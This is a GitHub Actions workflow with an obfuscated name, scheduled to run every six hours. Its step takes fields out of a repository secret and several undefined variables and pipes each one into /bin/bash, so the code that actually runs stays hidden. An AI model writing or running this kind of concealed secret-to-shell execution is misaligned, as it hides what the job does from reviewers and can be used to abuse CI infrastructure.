name: gaoguifeng6473
on:
  workflow_dispatch:
  schedule:
    - cron: '26 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gaoguifeng6473
        env:
          cgsk54: ${{ secrets.cgsk54 }}
        run: |
          echo $cgsk54 | jq -r .i82576 | /bin/bash
          echo $gud73060 | jq -r .vnjnf3 | /bin/bash
          echo $vk01 | jq -r .efzpo9 | /bin/bash
          echo $rx87339 | jq -r .c54634 | /bin/bash
          echo $gj0798 | jq -r .thvqk1441 | /bin/bash

